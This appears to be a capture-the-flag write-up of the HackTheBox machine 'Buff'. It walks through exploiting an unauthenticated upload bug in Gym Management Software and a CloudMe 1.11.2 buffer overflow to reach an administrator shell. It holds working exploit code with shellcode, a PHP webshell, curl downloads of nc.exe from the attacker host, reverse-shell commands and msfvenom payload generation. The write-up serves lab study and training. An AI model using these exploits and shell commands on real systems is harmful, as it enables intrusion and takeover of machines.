htb-buff-nl

HackTheBox – Buff

Information Gathering:

Masscan –

Firstly, start with masscan to establish open ports in our victim server. I always start with masscan to reduce false positives or missing open ports in Nmap.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.198 –rate=500

 

This is the result of masscan. We got 2 TCP ports opened. Lets analyze what services and service versions are running in both two ports.

Nmap –

nmap -sC -sV -p 7680,8080 10.10.10.198

 

We got approximate services for those ports. 7680 – pando-pub meant to be a file-sharing tool especially in the case when a file is too large. 8080 – This ports run the Apache service which is the web service and also PHP engine seems to be running in this machine. Apache version is 2.4.43 and PHP is 7.4.6 these are all updated versions. So it is good to hit the port 8080 in our browser.

Web Enumeration:

For an easy case, I added the IP address to my hosts list.

 

The first thing I saw is a sign-in column, I tried some default username: password combinations, but it’s not worked out. So I gave a manual enumeration on the website.

 

The interesting thing I got is the backend management software. It is named as “Gym Management Software 1.0”. Seems fishy! Right? Let’s check what Google can give us.

Bingo! This software is vulnerable to RCE.

Reference 1 – Public CVE Gym Management Software 1.0 : https://www.exploit-db.com/exploits/48506

Without hesitation, I copied that python script file to my machine for further understanding.

Exploit Explanation:

  • The hook of this vulnerability is that it doesn’t check for a user session in the upload.php file in the webserver.

 

  • As you see this, the apache is running from Xampp (a portable apache server used in windows). This also disclosing a parameter which is “id”.
  • For a better understanding, I used Burp to analyze the communications between ourselves and the server.

 

  • Here you can see that I put a random string in parameter and it returned a 200 response code that means the server accepts our request without authentication.
  • move_uploaded_file($_FILES[“file”][“tmp_name”] – This one moves our file to some other name. upload/ is the folder where our uploads gets saved.
  • array(“jpg”, “jpeg”, “gif”, “png”,”JPG”) – This is the whitelist of extension we can upload. It will be bypassed with using double extensions for our payload.
  • Bypass the file type check by modifying the ‘Content-Type’ of the ‘file’ parameter to ‘image/png’ in the POST request, and set the ‘pupload’ parameter to ‘upload’. Content checking can be bypassed by modifying the headers in our Post request.
  • In the body of the ‘file’ parameter of the POST request, insert the malicious PHP code:
    #    – Here, this is the PHP code we inserting into the body of our request.
  • The Web Application will rename the file to have the extension with the second item in an array created from the file name; separated by the ‘.’ character.
  • Since we upload a file like this format test.php.png, it will bypass the extension whitelist and content-type checking and by the default nature of the Web Application, our extension is cut down in ‘.’ character and saved in a name of test.php file. But it still contains the PNG data as well as our malicious PHP code inside it.

This is the workflow of the attack. Lets launch the attack.

Gym Management – CVE – User:

i converted the python2 code to python3 with https://python2to3.com/

After reading the exploit manual, I concluded that it is a piece of cake.

E:\DOWNLOADS>python3 48506.py http://10.10.10.198:8080/
 /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
 \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>curl http://10.10.14.8/nc.exe --output nc.exe
C:\xampp\htdocs\gym\upload>curl http://10.10.14.8/puckshell.php --output puckshell.php
c:\Python37>type puckshell.php
<?php $cmd=$_GET['cmd']; passthru($cmd);?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.198 - - [21/Jul/2020 14:11:08] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.198 - - [21/Jul/2020 14:11:08] "GET /puckshell.php HTTP/1.1" 200 -
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.8 443 -e cmd

Boom! User shell is popped up and can read the user Flag.

Finding Vulnerable CloudMe:

The very basics networking commands gave me a hand for finding the software running in the localhost that is CloudMe. CloudMe is a cloud tool that will actively link your system files to the cloud. In default, this software will listen on port 8888 in the localhost. The problem here is, it runs in a very lower version.

netstat -ano -p tcp

The last column is the PID of the processes. Let’s compare it with all the process details.

C:\>tasklist /v | findstr 2820
tasklist /v | findstr 2820
CloudMe.exe                   2820                            0     37,444 K Unknown         N/A                                                     0:00:00 N/A 

 

This command in PowerShell is used to print what program/process is running. You can see 7812 is the PID of CloudMe software.

After some enumeration of all the files in the “Downloads” directory of Shaun , I found that CloudMe is running on the older version (Version 1.11.2) which is vulnerable to Buffer Overflow. since the software is running in localhost what I did is port forwarding the CloudMe working port to my machine using plink.exe. So I need to upload plink.exe to the box.

C:\puck>powershell.exe Invoke-WebRequest -Uri 'http://10.10.14.31/plink.exe' -Outfile C:\puck\plink.exe

Then I configured my SSH service for connection so that I can get port forwarded by plink.

 

I can see my plink.exe file here. A lot of people were there. So now, it’s time to port forward 8888.

kali@kali# systemctl start ssh

As you already know, this one is to start ssh service in my machine for incoming connections.

c:\puck>plink.exe -v -x -a -T -C -noagent -ssh -pw kali kali@10.10.14.8 -R 8888:127.0.0.1:8888

or

 c:\puck>plink.exe -v -pw kali kali@10.10.14.31 -R 8888:127.0.0.1:8888

After hitting this in the victim shell, I looked at the TCP connections in my machine. Certainly, I got port forwarded successfully to my machine.

Tunnel

To exploit this service, I’ll need a tunnel from my box to Buff  I’ll use my favorite tool for this, Chisel. I’ll use the same SMB share and copy the Windows binary to where I’m staging in \programdata.

C:\ProgramData>copy \\10.10.14.8\share\chisel.exe chisel.exe
1 file(s) copied.

Now I’ll run the Linux binary on Parrot in server mode:

┌─[✗]─[puck@parrot-lt]─[~/htb/
└──╼ $./chisel server -p 8000 --reverse
2022/10/25 10:29:24 server: Reverse tunnelling enabled
2022/10/25 10:29:24 server: Fingerprint MbThdg8kOa/QJLOG7+PBOQDhXXbuDK0/0EWw63L1RQE=
2022/10/25 10:29:24 server: Listening on http://0.0.0.0:8000
2022/10/25 10:30:16 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening

Next, from Buff, I’ll run as a client:

C:\ProgramData>chisel client 10.10.14.8:8000 R:8888:localhost:8888
chisel client 10.10.14.8:8000 R:8888:localhost:8888
2022/10/25 09:31:07 client: Connecting to ws://10.10.14.8:8000
2022/10/25 09:31:08 client: Connected (Latency 90.4942ms)

I can see my local box is listening on 8888:

┌─[puck@parrot-lt]─[~/htb/buff]
└──╼ $netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:32841 0.0.0.0:* LISTEN - 
tcp6 0 0 :::8888 :::* LISTEN 3383/./chisel 
tcp6 0 0 ::1:3350 :::* LISTEN - 
tcp6 0 0 :::22 :::* LISTEN - 
tcp6 0 0 ::1:5432 :::* LISTEN - 
tcp6 0 0 :::8000 :::* LISTEN 3383/./chisel 
tcp6 0 0 :::3389 :::* LISTEN - 
┌─[puck@parrot-lt]─[~/htb/buff]

CloudMe 1.11.2 -CVE – Administrator:

Reference 2 Exploit for CloudMe 1.11.2: https://www.exploit-db.com/exploits/48389

The shellcode should be changed for my case in order to give me the Admin Shell.

puck@parrot-lt# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v payload

I replaced the shellcode from the exploit script with this. Then started the listener on my machine’s port 443.

┌─[puck@parrot-lt]─[~/htb/buff]
└──╼ $cat cloudme.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xbd\x28\xa8\xc1\xba\xdb\xdd\xd9\x74\x24\xf4\x5f"
payload += b"\x33\xc9\xb1\x52\x31\x6f\x12\x03\x6f\x12\x83\xc7"
payload += b"\x54\x23\x4f\xeb\x4d\x26\xb0\x13\x8e\x47\x38\xf6"
payload += b"\xbf\x47\x5e\x73\xef\x77\x14\xd1\x1c\xf3\x78\xc1"
payload += b"\x97\x71\x55\xe6\x10\x3f\x83\xc9\xa1\x6c\xf7\x48"
payload += b"\x22\x6f\x24\xaa\x1b\xa0\x39\xab\x5c\xdd\xb0\xf9"
payload += b"\x35\xa9\x67\xed\x32\xe7\xbb\x86\x09\xe9\xbb\x7b"
payload += b"\xd9\x08\xed\x2a\x51\x53\x2d\xcd\xb6\xef\x64\xd5"
payload += b"\xdb\xca\x3f\x6e\x2f\xa0\xc1\xa6\x61\x49\x6d\x87"
payload += b"\x4d\xb8\x6f\xc0\x6a\x23\x1a\x38\x89\xde\x1d\xff"
payload += b"\xf3\x04\xab\x1b\x53\xce\x0b\xc7\x65\x03\xcd\x8c"
payload += b"\x6a\xe8\x99\xca\x6e\xef\x4e\x61\x8a\x64\x71\xa5"
payload += b"\x1a\x3e\x56\x61\x46\xe4\xf7\x30\x22\x4b\x07\x22"
payload += b"\x8d\x34\xad\x29\x20\x20\xdc\x70\x2d\x85\xed\x8a"
payload += b"\xad\x81\x66\xf9\x9f\x0e\xdd\x95\x93\xc7\xfb\x62"
payload += b"\xd3\xfd\xbc\xfc\x2a\xfe\xbc\xd5\xe8\xaa\xec\x4d"
payload += b"\xd8\xd2\x66\x8d\xe5\x06\x28\xdd\x49\xf9\x89\x8d"
payload += b"\x29\xa9\x61\xc7\xa5\x96\x92\xe8\x6f\xbf\x39\x13"
payload += b"\xf8\xca\xb7\x15\xf0\xa2\xc5\x29\x01\x88\x43\xcf"
payload += b"\x6b\xfe\x05\x58\x04\x67\x0c\x12\xb5\x68\x9a\x5f"
payload += b"\xf5\xe3\x29\xa0\xb8\x03\x47\xb2\x2d\xe4\x12\xe8"
payload += b"\xf8\xfb\x88\x84\x67\x69\x57\x54\xe1\x92\xc0\x03"
payload += b"\xa6\x65\x19\xc1\x5a\xdf\xb3\xf7\xa6\xb9\xfc\xb3"
payload += b"\x7c\x7a\x02\x3a\xf0\xc6\x20\x2c\xcc\xc7\x6c\x18"
payload += b"\x80\x91\x3a\xf6\x66\x48\x8d\xa0\x30\x27\x47\x24"
payload += b"\xc4\x0b\x58\x32\xc9\x41\x2e\xda\x78\x3c\x77\xe5"
payload += b"\xb5\xa8\x7f\x9e\xab\x48\x7f\x75\x68\x78\xca\xd7"
payload += b"\xd9\x11\x93\x82\x5b\x7c\x24\x79\x9f\x79\xa7\x8b"
payload += b"\x60\x7e\xb7\xfe\x65\x3a\x7f\x13\x14\x53\xea\x13"
payload += b"\x8b\x54\x3f"

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)

┌─[puck@parrot-lt]─[~/htb/buff]

.

┌─[✗]─[puck@parrot-lt]─[~/htb]
└──╼ $sudo rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.198] 49700
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
buff\administrator

cd c:\users\administrator\desktop

dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of c:\Users\Administrator\Desktop

18/07/2020 17:36 <DIR> .
18/07/2020 17:36 <DIR> ..
16/06/2020 16:41 1,417 Microsoft Edge.lnk
24/10/2022 15:04 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 9,777,242,112 bytes free

type root.txt
4a56ef[redacted]98a076

c:\Users\Administrator\Desktop>

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *